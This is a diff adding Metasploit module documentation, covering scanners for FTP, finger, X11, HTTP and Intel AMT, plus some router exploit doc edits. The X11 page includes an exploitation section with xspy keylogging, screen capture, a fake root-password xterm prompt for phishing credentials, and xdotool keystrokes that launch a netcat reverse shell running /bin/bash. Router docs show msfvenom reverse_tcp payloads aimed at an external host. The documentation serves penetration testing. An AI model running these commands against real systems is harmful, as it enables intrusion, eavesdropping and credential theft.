-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
|
||||
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
|
||||
|
||||
[+] 127.0.0.1:19 answers with 1022 bytes (headers + UDP payload)
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,58 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine.
|
||||
The protocol itself was designed in the 1970s, and is run in cleartext.
|
||||
|
||||
The following was done on Kali linux:
|
||||
|
||||
1. `apt-get install inetutils-inetd fingerd`
|
||||
2. Start the service: `/etc/init.d/inetutils-inetd start`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install fingerd
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/finger/finger_users`
|
||||
4. Do: `set rhosts`
|
||||
5. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
**USERS_FILE**
|
||||
|
||||
The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the configuration from these docs
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/finger/finger_users
|
||||
msf auxiliary(finger_users) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf auxiliary(finger_users) > run
|
||||
|
||||
[+] 127.0.0.1:79 - 127.0.0.1:79 - Found user: root
|
||||
[+] 127.0.0.1:79 - 127.0.0.1:79 Users found: root
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Confirming using NMAP
|
||||
|
||||
Utilizing the [finger](https://nmap.org/nsedoc/scripts/finger.html) script
|
||||
|
||||
```
|
||||
# nmap -p 79 --script finger 127.0.0.1
|
||||
|
||||
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-26 19:35 EDT
|
||||
Nmap scan report for localhost (127.0.0.1)
|
||||
Host is up (0.000039s latency).
|
||||
PORT STATE SERVICE
|
||||
79/tcp open finger
|
||||
| finger: Login Name Tty Idle Login Time Office Office Phone\x0D
|
||||
| root root tty2 16d Apr 10 19:17 (:0)\x0D
|
||||
|_root root *pts/3 1d Apr 25 19:11 (192.168.2.175)\x0D
|
||||
|
||||
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
|
||||
```
|
|
@ -0,0 +1,93 @@
|
|||
## Description
|
||||
|
||||
This module allows us to scan through a series of IP Addresses and provide details whether anonymous access is allowed or not in that particular FTP server. By default, anonymous access is not allowed by the FTP server.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
### Install ftp server on Kali Linux:
|
||||
|
||||
1. ```apt-get install vsftpd```
|
||||
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
|
||||
|
||||
```
|
||||
local_enable=YES
|
||||
write_enable=YES
|
||||
chroot_list_enable=YES
|
||||
chroot_list_file=/etc/vsftpd.chroot_list
|
||||
```
|
||||
|
||||
3. **IMPORTANT:** For allowing anonymous access set ```anonymous_enable=YES```
|
||||
4. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
|
||||
5. ```service vsftpd start```
|
||||
|
||||
### Installing FTP for IIS 7.5 in Windows:
|
||||
|
||||
#### IIS 7.5 for Windows Server 2008 R2:
|
||||
|
||||
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
|
||||
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
|
||||
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
|
||||
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
|
||||
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
6. Click Next.
|
||||
7. On the Confirm Installation Selections page, click Install.
|
||||
8. On the Results page, click Close.
|
||||
|
||||
|
||||
|
||||
#### IIS 7.5 for Windows 7:
|
||||
|
||||
1. On the taskbar, click Start, and then click Control Panel.
|
||||
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
|
||||
3. Expand Internet Information Services, then FTP Server.
|
||||
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
5. Click OK.
|
||||
|
||||
#### Enabling anonymous login on IIS
|
||||
|
||||
1. Open IIS Manager and navigate to the level you want to manage. ...
|
||||
2. In Features View, double-click Authentication.
|
||||
3. On the Authentication page, select Anonymous Authentication.
|
||||
4. In the Actions pane, click Enable to use Anonymous authentication with the default settings.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/ftp/anonymous```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [IP]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
|
||||
### On vsFTPd 3.0.3 on Kali
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ftp/anonymous
|
||||
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf auxiliary(anonymous) > set RPORT 21
|
||||
RPORT => 21
|
||||
msf auxiliary(anonymous) > exploit
|
||||
|
||||
[+] 127.0.0.1:21 - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(anonymous) >
|
||||
```
|
||||
|
||||
## Confirming using NMAP
|
||||
|
||||
```
|
||||
root@kali:~# nmap -sV -sC 127.0.0.1 -p 21
|
||||
|
||||
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 22:58 IST
|
||||
Nmap scan report for localhost (127.0.0.1)
|
||||
Host is up (0.000035s latency).
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp vsftpd 3.0.3
|
||||
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||||
Service Info: OS: Unix
|
||||
|
||||
root@kali:~#
|
||||
```
|
||||
|
|
@ -0,0 +1,62 @@
|
|||
## Description
|
||||
|
||||
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
### Install ftp server on Kali Linux:
|
||||
|
||||
1. ```apt-get install vsftpd```
|
||||
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
|
||||
|
||||
```
|
||||
local_enable=YES
|
||||
write_enable=YES
|
||||
chroot_list_enable=YES
|
||||
chroot_list_file=/etc/vsftpd.chroot_list
|
||||
```
|
||||
|
||||
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
|
||||
4. ```service vsftpd start```
|
||||
|
||||
### Installing FTP for IIS 7.5 in Windows:
|
||||
|
||||
#### IIS 7.5 for Windows Server 2008 R2:
|
||||
|
||||
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
|
||||
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
|
||||
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
|
||||
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
|
||||
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
6. Click Next.
|
||||
7. On the Confirm Installation Selections page, click Install.
|
||||
8. On the Results page, click Close.
|
||||
|
||||
#### IIS 7.5 for Windows 7:
|
||||
|
||||
1. On the taskbar, click Start, and then click Control Panel.
|
||||
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
|
||||
3. Expand Internet Information Services, then FTP Server.
|
||||
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
5. Click OK.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/ftp/ftp_login```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [IP]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
```
|
||||
msf> use auxiliary/scanner/ftp/ftp_login
|
||||
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org
|
||||
msf auxiliary(ftp_login) > set USERNAME ftp
|
||||
msf auxiliary(ftp_login) > set PASSWORD hello@metasploit.com
|
||||
msf auxiliary(ftp_login) > run
|
||||
[*] 129.128.5.191:21 - Starting FTP login sweep
|
||||
[+] 129.128.5.191:21 - LOGIN SUCCESSFUL: ftp:hello@metasploit.com
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(ftp_login) >
|
||||
```
|
|
@ -0,0 +1,80 @@
|
|||
## Description
|
||||
|
||||
This module allows us to scan through a series of IP Addresses and provide details about the version of ftp running on that address.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
### Install ftp server on Kali Linux:
|
||||
|
||||
1. ```apt-get install vsftpd```
|
||||
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
|
||||
|
||||
```
|
||||
local_enable=YES
|
||||
write_enable=YES
|
||||
chroot_list_enable=YES
|
||||
chroot_list_file=/etc/vsftpd.chroot_list
|
||||
```
|
||||
|
||||
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
|
||||
4. ```service vsftpd start```
|
||||
|
||||
### Installing FTP for IIS 7.5 in Windows:
|
||||
|
||||
#### IIS 7.5 for Windows Server 2008 R2:
|
||||
|
||||
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
|
||||
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
|
||||
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
|
||||
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
|
||||
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
6. Click Next.
|
||||
7. On the Confirm Installation Selections page, click Install.
|
||||
8. On the Results page, click Close.
|
||||
|
||||
#### IIS 7.5 for Windows 7:
|
||||
|
||||
1. On the taskbar, click Start, and then click Control Panel.
|
||||
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
|
||||
3. Expand Internet Information Services, then FTP Server.
|
||||
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
5. Click OK.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/ftp/ftp_version```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [IP]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
|
||||
### On vsFTPd 3.0.3 on Kali
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ftp/ftp_version
|
||||
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf auxiliary(ftp_version) > set RPORT 21
|
||||
RPORT => 21
|
||||
msf auxiliary(ftp_version) > exploit
|
||||
|
||||
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(ftp_version) >
|
||||
```
|
||||
## Confirming using NMAP
|
||||
```
|
||||
root@kali:~# nmap -sV 127.0.0.1 -p21
|
||||
|
||||
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 23:11 IST
|
||||
Nmap scan report for localhost (127.0.0.1)
|
||||
Host is up (0.000035s latency).
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp vsftpd 3.0.3
|
||||
Service Info: OS: Unix
|
||||
|
||||
root@kali:~#
|
||||
|
||||
```
|
|
@ -0,0 +1,102 @@
|
|||
## Description
|
||||
|
||||
This module is a http crawler, it will browse the links recursively from the
|
||||
web site. If you have loaded a database plugin and connected to a database,
|
||||
this module will report web pages and web forms.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
You can use any web application to test the crawler.
|
||||
|
||||
## Options
|
||||
|
||||
**URI**
|
||||
|
||||
Default path is `/`
|
||||
|
||||
**DirBust**
|
||||
|
||||
Bruteforce common url path, default is `true` but may generate noise in reports.
|
||||
|
||||
**HttpPassword**, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**
|
||||
|
||||
You can add some login information
|
||||
|
||||
**UserAgent**
|
||||
|
||||
Default User Agent is `Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/http/crawler```
|
||||
2. Do: ```set RHOST [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: ```set URI [PATH]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
|
||||
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
|
||||
```
|
||||
msf> use auxiliary/scanner/http/crawler
|
||||
msf auxiliary(crawler) > set RHOST 127.0.0.1
|
||||
msf auxiliary(crawler) > set RPORT 8080
|
||||
msf auxiliary(crawler) > set URI /webgoat/
|
||||
msf auxiliary(crawler) > set DirBust false
|
||||
msf auxiliary(crawler) > run
|
||||
[*] Crawling http://127.0.0.1:8008/webgoat/...
|
||||
[*] [00001/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/ -> /webgoat/login.mvc
|
||||
[*] [00002/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
|
||||
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
[-] [00003/00500] 404 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/images/favicon.ico
|
||||
[*] [00004/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/plugins/bootstrap/css/bootstrap.min.css
|
||||
[*] [00005/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/font-awesome.min.css
|
||||
[*] [00006/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/animate.css
|
||||
[*] [00007/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202 -> /webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
|
||||
[*] [00008/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
|
||||
[*] FORM: GET /webgoat/login.mvc
|
||||
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
[*] [00009/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/main.css
|
||||
[*] [00010/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/start.mvc -> http://127.0.0.1:8008/webgoat/login.mvc
|
||||
[*] [00011/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
|
||||
[*] FORM: POST /webgoat/j_spring_security_check
|
||||
[*] Crawl of http://127.0.0.1:8008/webgoat/ complete
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Follow-on: Wmap
|
||||
|
||||
As you see, the result is not very user friendly...
|
||||
|
||||
But you can view a tree of your website with the Wmap plugin. Simply run :
|
||||
|
||||
```
|
||||
msf auxiliary(crawler) > load wmap
|
||||
msf auxiliary(crawler) > wmap_sites -l
|
||||
[*] Available sites
|
||||
===============
|
||||
|
||||
Id Host Vhost Port Proto # Pages # Forms
|
||||
-- ---- ----- ---- ----- ------- -------
|
||||
0 127.0.0.1 127.0.0.1 8080 http 70 80
|
||||
|
||||
|
||||
msf auxiliary(crawler) > wmap_sites -s 0
|
||||
|
||||
[127.0.0.1] (127.0.0.1)
|
||||
└── webgoat (7)
|
||||
├── css (3)
|
||||
│ ├── animate.css
|
||||
│ ├── font-awesome.min.css
|
||||
│ └── main.css
|
||||
├── j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
├── login.mvc
|
||||
├── login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
├── plugins (1)
|
||||
│ └── bootstrap (1)
|
||||
│ └── css (1)
|
||||
│ └── bootstrap.min.css
|
||||
├── start.mvc
|
||||
└── j_spring_security_check
|
||||
|
||||
```
|
|
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits vulnerable versions of the Intel Management Engine (ME) firmware present Intel Core CPU 1st through 7th generations that allows authentication bypass and full control over the target machine, if the Active Management Technology feature is enabled and networking is configured.
|
||||
|
||||
**Vulnerable Application Installation Steps**
|
||||
|
||||
Enable the feature in the firmware setup screen on any vulnerable target machine. The module has been tested on HP and Lenovo desktops and laptops.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
A successful run of the module will look like this:
|
||||
|
||||
|
||||
```
|
||||
msf auxiliary(telnet_version) > use auxiliary/scanner/http/intel_amt_digest_bypass
|
||||
msf auxiliary(intel_amt_digest_bypass) > show options
|
||||
|
||||
Module options (auxiliary/scanner/http/intel_amt_digest_bypass):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target address range or CIDR identifier
|
||||
RPORT 16992 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
THREADS 1 yes The number of concurrent threads
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
msf auxiliary(intel_amt_digest_bypass) > set rhosts 192.168.1.18
|
||||
rhosts => 192.168.1.18
|
||||
msf auxiliary(intel_amt_digest_bypass) > run
|
||||
|
||||
[+] 192.168.1.18:16992 - Vulnerable to CVE-2017-5869 {"Computer model"=>"30A70051US", "Manufacturer"=>"LENOVO", "Version"=>"A4KT80AUS", "Serial number"=>" ", "System ID"=>"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", "Product name"=>"To be filled by O.E.M.", "Asset tag"=>" ", "Replaceable?"=>"Yes", "Vendor"=>"LENOVO", "Release date"=>"09/23/2015"}
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,52 @@
|
|||
## Description
|
||||
|
||||
This module will detect `robots.txt` files on web servers and analyze its content.
|
||||
The `robots.txt` file is a file which is supposed to be honored by web crawlers
|
||||
and bots, as locations which are not to be indexed or specifically called out
|
||||
to be indexed. This can be abused to reveal interesting information about areas
|
||||
of the site which an admin may not want to be public knowledge.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
You can use almost any web application to test this module, as `robots.txt`
|
||||
is extremely common.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use auxiliary/scanner/http/robots_txt`
|
||||
2. Do: `set rhosts [ip]`
|
||||
3. Do: `run`
|
||||
4. You should get the `robots.txt` file content
|
||||
|
||||
## Options
|
||||
|
||||
**PATH**
|
||||
|
||||
You can set the test path where the scanner will try to find `robots.txt` file.
|
||||
Default is `/`
|
||||
|
||||
## Sample Output
|
||||
```
|
||||
msf> use auxiliary/scanner/http/robots_txt
|
||||
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238
|
||||
msf auxiliary(robots_txt) > run
|
||||
[*] [172.217.19.238] /robots.txt found
|
||||
[+] Contents of Robots.txt:
|
||||
User-agent: *
|
||||
Disallow: /search
|
||||
Allow: /search/about
|
||||
Disallow: /sdch
|
||||
Disallow: /groups
|
||||
Disallow: /index.html?
|
||||
Disallow: /?
|
||||
```
|
||||
|
||||
[...Truncated...]
|
||||
|
||||
```
|
||||
User-agent: facebookexternalhit
|
||||
Allow: /imgres
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,198 @@
|
|||
## Vulnerable Application
|
||||
|
||||
X11 (X Window System) is a graphical windowing system most common on unix/linux, although implementations may be found in windows
|
||||
with software such as Hummingbird Exceed X Server. The service can accept connections from any users when misconfigured
|
||||
which is done with the command `xhost +`.
|
||||
|
||||
### Ubuntu 10.04
|
||||
|
||||
1. `sudo nano /etc/gdm/gdm.schemas`
|
||||
2. Find:
|
||||
|
||||
```
|
||||
<schema>
|
||||
<key>security/DisallowTCP</key>
|
||||
<signature>b</signature>
|
||||
<default>true</default>
|
||||
</schema>
|
||||
```
|
||||
- Change `true` to `false`
|
||||
|
||||
3. logout or reboot
|
||||
4. Verification: ```sudo netstat -antp | grep 6000```
|
||||
|
||||
```
|
||||
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
|
||||
```
|
||||
|
||||
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Ubuntu 12.04, 14.04
|
||||
|
||||
1. `sudo nano /etc/lightdm/lightdm.conf`
|
||||
2. Under the `[SeatDefaults]` area, add:
|
||||
|
||||
```
|
||||
xserver-allow-tcp=true
|
||||
allow-guest=true
|
||||
```
|
||||
|
||||
3. logout or reboot
|
||||
4. Verification: ```sudo netstat -antp | grep 6000```
|
||||
|
||||
```
|
||||
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
|
||||
```
|
||||
|
||||
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
|
||||
|
||||
### Fedora 15
|
||||
|
||||
1. `vi /etc/gdm/custom.conf`
|
||||
2. Under the `[security]` area, add:
|
||||
|
||||
```
|
||||
DisallowTCP=false
|
||||
```
|
||||
|
||||
3. logout/reboot
|
||||
4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Solaris 10
|
||||
|
||||
1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true`
|
||||
2. `svc disable cde-login`
|
||||
3. `svc enable cde-login`
|
||||
4. `xhost +`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure X11
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/x11/open_x11`
|
||||
4. Do: `set rhosts [IPs]`
|
||||
5. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against Ubuntu 14.04 (192.168.2.75), Ubuntu 16.04 (192.168.2.26), and Solaris 10 (192.168.2.32)
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/x11/open_x11
|
||||
msf auxiliary(open_x11) > set rhosts 192.168.2.75 192.168.2.26
|
||||
rhosts => 192.168.2.75 192.168.2.26
|
||||
msf auxiliary(open_x11) > run
|
||||
|
||||
[+] 192.168.2.75:6000 - 192.168.2.75 Open X Server (The X.Org Foundation)
|
||||
[*] Scanned 1 of 3 hosts (33% complete)
|
||||
[+] 192.168.2.26:6000 - 192.168.2.26 Open X Server (The X.Org Foundation)
|
||||
[*] Scanned 2 of 3 hosts (66% complete)
|
||||
[+] 192.168.2.32:6000 - 192.168.2.32 Open X Server (Sun Microsystems, Inc.)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Confirming
|
||||
|
||||
The following are other industry tools which can also be used.
|
||||
|
||||
### [nmap](https://nmap.org/nsedoc/scripts/x11-access.html)
|
||||
|
||||
```
|
||||
# nmap -p 6000 --script=x11-access 192.168.2.26,75
|
||||
|
||||
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-23 13:15 EDT
|
||||
Nmap scan report for ubuntu-desktop-16 (192.168.2.26)
|
||||
Host is up (0.0021s latency).
|
||||
PORT STATE SERVICE
|
||||
6000/tcp open X11
|
||||
|_x11-access: X server access is granted
|
||||
MAC Address: 00:0C:29:60:27:F9 (VMware)
|
||||
|
||||
Nmap scan report for ubuntu-desktop-14 (192.168.2.75)
|
||||
Host is up (0.0021s latency).
|
||||
PORT STATE SERVICE
|
||||
6000/tcp open X11
|
||||
|_x11-access: X server access is granted
|
||||
MAC Address: 00:0C:29:0E:C4:6E (VMware)
|
||||
```
|
||||
|
||||
### xdpyinfo
|
||||
|
||||
This is one of the standard linux tools to get info on an X display.
|
||||
|
||||
```
|
||||
# xdpyinfo -display 192.168.2.75:0 | head -n 5
|
||||
|
||||
name of display: 192.168.2.75:0
|
||||
version number: 11.0
|
||||
vendor string: The X.Org Foundation
|
||||
vendor release number: 11803000
|
||||
X.Org version: 1.18.3
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
|
||||
Exploiting this mis-configuration has several methods. The target can have their display viewed, keystrokes logged, and potential keyboard typed.
|
||||
|
||||
### Keylogging
|
||||
|
||||
To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy)
|
||||
|
||||
`xspy -display [ip]:0`
|
||||
|
||||
### Screen Monitoring
|
||||
|
||||
#### Entire Display
|
||||
|
||||
It is possible to monitor the entire display (all windows) and view the content.
|
||||
|
||||
- Take a screenshot: `xwd -root -display [ip]:[display] -out xdump.xdump`
|
||||
- View screenshot: `display xdump.xdump` or `xwud -in xdump.xdump`
|
||||
|
||||
#### Specific Window
|
||||
|
||||
To monitor only a single window (a terminal for instance)
|
||||
|
||||
First, we need to determine which windows are available and what their processes are:
|
||||
|
||||
- `xwininfo -tree -root -display [ip]:0`
|
||||
|
||||
Once you determine which window you want to monitor, you'll want to use the `windowID`. Now use the application `xwatchwin`
|
||||
|
||||
- `xwatchwin [ip]:0 -w [windowID]`
|
||||
|
||||
### Social Engineering
|
||||
|
||||
Obviously watching keystrokes is good, but we want to coax the user into providing their password. We can do this by using xterm to display a login box to the user.
|
||||
|
||||
This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10.
|
||||
|
||||
1. start `xspy`
|
||||
2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"`
|
||||
- Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username
|
||||
- The victim's typed text by the user will not be masked (`*`)
|
||||
|
||||
### Direct Exploitation
|
||||
|
||||
Use `exploits/unix/x11/x11_keyboard_exec`
|
||||
|
||||
### Typing Commands
|
||||
|
||||
Similar to the method `exploits/unix/x11/x11_keyboard_exec` uses, its possible to use `xdotool` to run commands on the remote system.
|
||||
|
||||
To install `xdotool` on kali simply run `apt-get install xdotool`
|
||||
|
||||
Now, you can directly interact by typing commands (which appear on the users screen), an example would be running xterm and launching netcat.
|
||||
|
||||
For this scenario we run a simple reverse netcat to 192.168.2.9:80
|
||||
|
||||
```
|
||||
xdotool key alt+F2
|
||||
xdotool key x t e r m
|
||||
xdotool key KP_Enter
|
||||
xdotool key n c space 1 9 2 period 1 6 8 period 2 period 9 space 8 0 space minus e space slash b i n slash b a s h KP_Enter
|
||||
```
|
|
@ -38,7 +38,7 @@ that through command injection to gain Meterpreter root access.
|
|||
|
||||
With an attacker node that resides within the ISP network, do:
|
||||
|
||||
- Set `payload` to `linux/mipsbe/mettle_reverse_tcp`
|
||||
- Set `payload` to `linux/mipsbe/meterpreter_reverse_tcp`
|
||||
|
||||
- Set `RHOST` to the target router's IP
|
||||
|
||||
|
@ -73,7 +73,7 @@ module's own HTTP server and host it externally. To do so, first generate
|
|||
the payload ELF executable using `msfvenom`:
|
||||
|
||||
```
|
||||
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/mettle/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
|
||||
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
|
||||
|
||||
No encoder or badchars specified, outputting raw payload
|
||||
Payload size: 212 bytes
|
||||
|
|
|
@ -18,7 +18,7 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
|
|||
|
||||
**PAYLOAD**
|
||||
|
||||
The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
|
||||
The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
|
|
@ -0,0 +1,53 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits a command injection vulnerability in the [wePresent WiPG-1000](http://wepresentwifi.com/wipg1000.html) device. A description of the exploited vulnerability is available in section 3.4 of [this advisory](https://www.redguard.ch/advisories/wepresent-wipg1000.txt).
|
||||
The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to [the older firmware](http://www.wepresentwifi.com/assets/downloads/wipg1000/wePresent.1000.2.0.0.7.nad.zip).
|
||||
|
||||
